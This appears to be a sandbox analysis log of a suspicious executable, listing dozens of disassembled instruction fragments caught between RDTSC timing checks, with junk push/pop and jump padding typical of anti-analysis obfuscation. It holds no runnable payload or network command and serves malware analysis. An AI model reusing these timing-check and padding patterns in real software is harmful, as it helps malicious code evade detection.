Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AAF66 second address: 4AAF6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AAF6A second address: 4AAF70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5510A1 second address: 5510C3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBE451FC078h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FBE451FC07Eh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 551378 second address: 551391 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBE44B74B56h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FBE44B74B5Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5516D1 second address: 5516D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5516D5 second address: 5516EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE44B74B64h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5516EF second address: 551707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBE451FC084h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 551707 second address: 55170D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 551969 second address: 551971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 551971 second address: 55197B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBE44B74B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55197B second address: 55198E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBE451FC078h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55198E second address: 551994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 551994 second address: 5519AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE451FC086h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5519AF second address: 5519B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5519B4 second address: 5519BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 551C67 second address: 551CA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44B74B67h 0x00000007 jmp 00007FBE44B74B5Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBE44B74B62h 0x00000016 jo 00007FBE44B74B56h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 551CA8 second address: 551CAE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 551CAE second address: 551CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 551CBE second address: 551CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 551CC2 second address: 551CC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 552265 second address: 55227E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBE451FC07Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55227E second address: 5522AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44B74B60h 0x00000007 ja 00007FBE44B74B56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007FBE44B74B63h 0x00000015 jmp 00007FBE44B74B5Dh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 558AD0 second address: 558AD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 558AD6 second address: 558AE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jg 00007FBE44B74B56h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55BB90 second address: 55BB9A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBE451FC076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55BB9A second address: 55BBA9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55BBA9 second address: 55BBAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55BBAF second address: 55BBB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55C23E second address: 55C242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55C242 second address: 55C253 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jns 00007FBE44B74B56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55C3C5 second address: 55C3CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56317F second address: 563183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 563183 second address: 5631AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE451FC089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FBE451FC07Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 563BC4 second address: 563BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jbe 00007FBE44B74B72h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 563BD2 second address: 563BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 563E98 second address: 563EC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FBE44B74B66h 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBE44B74B5Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 563EC5 second address: 563EE1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBE451FC076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jnp 00007FBE451FC076h 0x00000013 pop edx 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 563EE1 second address: 563EF1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBE44B74B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5645CB second address: 5645E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE451FC081h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5645E0 second address: 5645EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007FBE44B74B56h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5645EC second address: 564609 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBE451FC084h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 562BC7 second address: 562BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE44B74B64h 0x00000009 pop edi 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBE44B74B68h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 562BFB second address: 562C25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBE451FC082h 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007FBE451FC07Bh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 562C25 second address: 562C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B305 second address: 56B339 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE451FC083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBE451FC084h 0x00000011 je 00007FBE451FC076h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B339 second address: 56B33F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57BE8A second address: 57BE90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57BE90 second address: 57BE9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBE44B74B56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57BE9C second address: 57BEAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FBE451FC076h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57BEAB second address: 57BEAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57BEAF second address: 57BEC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE451FC07Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 585704 second address: 585708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5884EE second address: 5884FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 jng 00007FBE451FC076h 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5884FF second address: 588503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58D061 second address: 58D06D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnc 00007FBE451FC076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58ECA5 second address: 58ECDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44B74B62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jno 00007FBE44B74B56h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop ecx 0x00000013 pop esi 0x00000014 je 00007FBE44B74B72h 0x0000001a push eax 0x0000001b jo 00007FBE44B74B56h 0x00000021 pop eax 0x00000022 push eax 0x00000023 push edx 0x00000024 js 00007FBE44B74B56h 0x0000002a push edx 0x0000002b pop edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59830C second address: 598315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 598315 second address: 598319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 598319 second address: 59831D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59831D second address: 59832A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59845C second address: 598460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 598460 second address: 59848C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FBE44B74B5Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FBE44B74B67h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59848C second address: 598492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 598994 second address: 598998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 598998 second address: 59899E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59BFC6 second address: 59BFDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBE44B74B5Eh 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59BFDA second address: 59BFF1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnp 00007FBE451FC076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jnp 00007FBE451FC076h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A5DA5 second address: 5A5DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B7FB4 second address: 5B7FE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FBE451FC081h 0x0000000c jmp 00007FBE451FC083h 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B7FE0 second address: 5B7FF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBE44B74B60h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B7E28 second address: 5B7E30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B7E30 second address: 5B7E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B7E38 second address: 5B7E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBE451FC083h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9FBF second address: 5B9FCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FBE44B74B56h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9BAB second address: 5B9BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FBE451FC082h 0x0000000b js 00007FBE451FC076h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D0E6C second address: 5D0E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FBE44B74B56h 0x0000000a popad 0x0000000b push eax 0x0000000c jng 00007FBE44B74B56h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D101B second address: 5D1021 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D1154 second address: 5D115A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D115A second address: 5D1160 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D1160 second address: 5D1193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBE44B74B67h 0x0000000d jmp 00007FBE44B74B64h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D1193 second address: 5D119D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBE451FC076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D1481 second address: 5D149A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBE44B74B56h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007FBE44B74B58h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D149A second address: 5D14B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE451FC082h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D14B2 second address: 5D14C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBE44B74B5Eh 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D162A second address: 5D162E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D162E second address: 5D1650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBE44B74B67h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D1650 second address: 5D1654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D1654 second address: 5D166A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FBE44B74B56h 0x00000010 jno 00007FBE44B74B56h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D166A second address: 5D166E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D17B3 second address: 5D17B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D47E3 second address: 5D47E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D488B second address: 5D4891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D4891 second address: 5D4895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D4895 second address: 5D48CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dl, ch 0x0000000b push 00000004h 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FBE44B74B58h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push E535DD9Ah 0x0000002c push edi 0x0000002d push eax 0x0000002e push edx 0x0000002f push edi 0x00000030 pop edi 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D4B87 second address: 5D4BCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE451FC088h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub dword ptr [ebp+1245203Dh], esi 0x00000012 push dword ptr [ebp+124520A6h] 0x00000018 movsx edx, cx 0x0000001b call 00007FBE451FC079h 0x00000020 push eax 0x00000021 push edx 0x00000022 jl 00007FBE451FC07Ch 0x00000028 jp 00007FBE451FC076h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D4BCC second address: 5D4C0D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBE44B74B58h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FBE44B74B5Eh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jc 00007FBE44B74B6Ch 0x0000001c jmp 00007FBE44B74B66h 0x00000021 mov eax, dword ptr [eax] 0x00000023 pushad 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
